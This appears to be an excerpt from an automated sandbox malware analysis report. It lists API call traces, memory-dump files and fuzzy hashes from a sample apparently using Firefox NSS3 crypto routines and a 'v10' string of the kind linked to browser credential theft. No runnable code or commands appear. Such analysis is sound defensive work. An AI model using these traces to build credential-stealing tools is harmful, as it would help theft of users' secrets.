                                                                                                                                                                                                                                                • Part of subcall function 6C2A3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2A3C66
                                                                                                                                                                                                                                                • Part of subcall function 6C2A3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C2A3D04
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C2B6DC0
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C2B6DE5
                                                                                                                                                                                                                                                • Part of subcall function 6C2B8010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B807D
                                                                                                                                                                                                                                                • Part of subcall function 6C2B8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B80D1
                                                                                                                                                                                                                                                • Part of subcall function 6C2B8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B810E
                                                                                                                                                                                                                                                • Part of subcall function 6C2B8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2B8140
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C2B6E7E
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2B6E96
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B6EC2
                                                                                                                                                                                                                                                • Part of subcall function 6C2B7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B7E27
                                                                                                                                                                                                                                                • Part of subcall function 6C2B7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2B7E67
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _byteswap_ulong$memcpy$_byteswap_ushort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3070372028-0
                                                                                                                                                                                                                                              • Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
                                                                                                                                                                                                                                              • Instruction ID: 1bfbe9834fa28f0eedf3e995c2136f96a06085db1623db25d5b42b65642829b9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D51AD719083569FC724CF25C890B6ABBE5FF88758F048A5DEC9997741E330E918CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F228
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F36D
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                                              • Opcode ID: cca630b2f95f4e826e9a6c859236e500537583a630315fa027596be9967944d5
                                                                                                                                                                                                                                              • Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cca630b2f95f4e826e9a6c859236e500537583a630315fa027596be9967944d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                              • String ID: @$v10
                                                                                                                                                                                                                                              • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                              • Opcode ID: 6fffcccd7e913edef19ca93c74df1373176caef86faec32c86a0297b7053f467
                                                                                                                                                                                                                                              • Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fffcccd7e913edef19ca93c74df1373176caef86faec32c86a0297b7053f467
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6C447379,00000002,?), ref: 6C3A2493
                                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C3A24B4
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C447379,00000002,?), ref: 6C3A24EA
                                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C447379,00000002,?), ref: 6C3A24F5
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C447379,00000002,?), ref: 6C3A24FE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Error$Alloc_FreeK11_Utilfree
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2595244113-0
                                                                                                                                                                                                                                              • Opcode ID: 5c170838c3c13f4ebf48850dec64382ec7cf2d2109b2da8f5298c1607f1f843d
                                                                                                                                                                                                                                              • Instruction ID: 9f582b0d87fc84958f132fb95f51269e2ad2e4bfb569505f026d769078f10b16
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c170838c3c13f4ebf48850dec64382ec7cf2d2109b2da8f5298c1607f1f843d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A13104B1A00115AFEB108FE6DD45BBBB7A4EF58308F104125FD5996A80E732D865CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6C3144FF
                                                                                                                                                                                                                                                • Part of subcall function 6C3707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C318298,?,?,?,6C30FCE5,?), ref: 6C3707BF
                                                                                                                                                                                                                                                • Part of subcall function 6C3707B0: PL_HashTableLookup.NSS3(?,?), ref: 6C3707E6
                                                                                                                                                                                                                                                • Part of subcall function 6C3707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C37081B
                                                                                                                                                                                                                                                • Part of subcall function 6C3707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C370825
                                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C314524
                                                                                                                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C314537
                                                                                                                                                                                                                                              • CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C314579
                                                                                                                                                                                                                                                • Part of subcall function 6C3141B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C3141BE
                                                                                                                                                                                                                                                • Part of subcall function 6C3141B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C3141E9
                                                                                                                                                                                                                                                • Part of subcall function 6C3141B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C314227
                                                                                                                                                                                                                                                • Part of subcall function 6C3141B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C31423D
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C31459C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3193526912-0
                                                                                                                                                                                                                                              • Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                                                                                                                                                                              • Instruction ID: fafd6b35304ded97675de2977b92743922c60b827d2e2a8d4765856493da9f01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D221A1716096159FEB18CE2AEC44F6B37AC9F4165CF140428B815CBE41FB22E904CEA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6C313FFF,00000000,?,?,?,?,?,6C311A1C,00000000,00000000), ref: 6C31ADA7
                                                                                                                                                                                                                                                • Part of subcall function 6C3714C0: TlsGetValue.KERNEL32 ref: 6C3714E0
                                                                                                                                                                                                                                                • Part of subcall function 6C3714C0: EnterCriticalSection.KERNEL32 ref: 6C3714F5
                                                                                                                                                                                                                                                • Part of subcall function 6C3714C0: PR_Unlock.NSS3 ref: 6C37150D
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C313FFF,00000000,?,?,?,?,?,6C311A1C,00000000,00000000), ref: 6C31ADB4
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C
                                                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6C313FFF,?,?,?,?,6C313FFF,00000000,?,?,?,?,?,6C311A1C,00000000), ref: 6C31ADD5
                                                                                                                                                                                                                                                • Part of subcall function 6C36FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C368D2D,?,00000000,?), ref: 6C36FB85
                                                                                                                                                                                                                                                • Part of subcall function 6C36FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C36FBB1
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C4394B0,?,?,?,?,?,?,?,?,6C313FFF,00000000,?), ref: 6C31ADEC
                                                                                                                                                                                                                                                • Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C313FFF), ref: 6C31AE3C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2372449006-0
                                                                                                                                                                                                                                              • Opcode ID: 97a402a19796099893e22b0cf2ed1b069d32183a18d006a34182a37b0acb599d
                                                                                                                                                                                                                                              • Instruction ID: 16677df1afe69ac71d7fb398e166d0064f7423fd167da9a8701cd2e5ded52d51
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a402a19796099893e22b0cf2ed1b069d32183a18d006a34182a37b0acb599d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F115632E042142BE7109A659C51BFF73F8DF9524DF004228EC9996A41FB21E95C8AB3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,04082BB0,?,0041D8AC,?,00000000,?), ref: 0041362C
                                                                                                                                                                                                                                              • sscanf.NTDLL ref: 00413659
                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,04082BB0,?,0041D8AC), ref: 00413672
                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,04082BB0,?,0041D8AC), ref: 00413680
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041369A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                                              • Opcode ID: 2d8e78d0dab9869f9047db96de010d3925a814e04e314d7ab9fafc73e4c55430
                                                                                                                                                                                                                                              • Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d8e78d0dab9869f9047db96de010d3925a814e04e314d7ab9fafc73e4c55430
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C3A461B,-00000004), ref: 6C3A04DF
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,?,6C3A461B,-00000004), ref: 6C3A0510
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C3A0520
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C3A461B,-00000004), ref: 6C3A0534
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6C3A461B,-00000004), ref: 6C3A0543
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3052423345-0
                                                                                                                                                                                                                                              • Opcode ID: 31af9e383bb9260d7ca90ab31be49ed5ecac2d08a15b3b82b391be591a1ca93a
                                                                                                                                                                                                                                              • Instruction ID: 3de41975705853851ab89fd3287313273030896bcb3c3774a0eb82d943613913
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31af9e383bb9260d7ca90ab31be49ed5ecac2d08a15b3b82b391be591a1ca93a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71112771A081819BDF00BBB8DC14B653A68EF1231DF604625E42BD7990EB32D566CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6C351E10: TlsGetValue.KERNEL32 ref: 6C351E36
                                                                                                                                                                                                                                                • Part of subcall function 6C351E10: EnterCriticalSection.KERNEL32(?,?,?,6C32B1EE,2404110F,?,?), ref: 6C351E4B
                                                                                                                                                                                                                                                • Part of subcall function 6C351E10: PR_Unlock.NSS3 ref: 6C351E76
                                                                                                                                                                                                                                              • free.MOZGLUE(?,6C33D079,00000000,00000001), ref: 6C33CDA5
                                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6C33D079,00000000,00000001), ref: 6C33CDB6
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C33D079,00000000,00000001), ref: 6C33CDCF
                                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6C33D079,00000000,00000001), ref: 6C33CDE2
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C33CDE9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1720798025-0
                                                                                                                                                                                                                                              • Opcode ID: a1a2b5cda2ea83c338a5724bc611e93d3d4c47d921f3d9b43572eda6639a5598
                                                                                                                                                                                                                                              • Instruction ID: 8793a3b54375dae3c952dfbfb850bf44119bdd82438a484e57eb604222725495
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1a2b5cda2ea83c338a5724bc611e93d3d4c47d921f3d9b43572eda6639a5598
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F115AB2B01165ABDE01AAA6EC45EA6B768BF042697144221F90D87E01E732E434CBE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6C3A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C3A5B56
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3A2CEC
                                                                                                                                                                                                                                                • Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF
                                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C3A2D02
                                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C3A2D1F
                                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C3A2D42
                                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C3A2D5B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
